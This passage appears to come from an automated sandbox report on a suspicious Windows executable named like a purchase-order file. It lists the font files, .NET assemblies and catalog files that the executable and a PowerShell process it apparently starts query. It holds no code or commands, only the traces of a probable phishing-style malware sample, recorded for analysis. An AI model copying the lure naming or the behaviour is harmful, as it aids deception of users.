                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
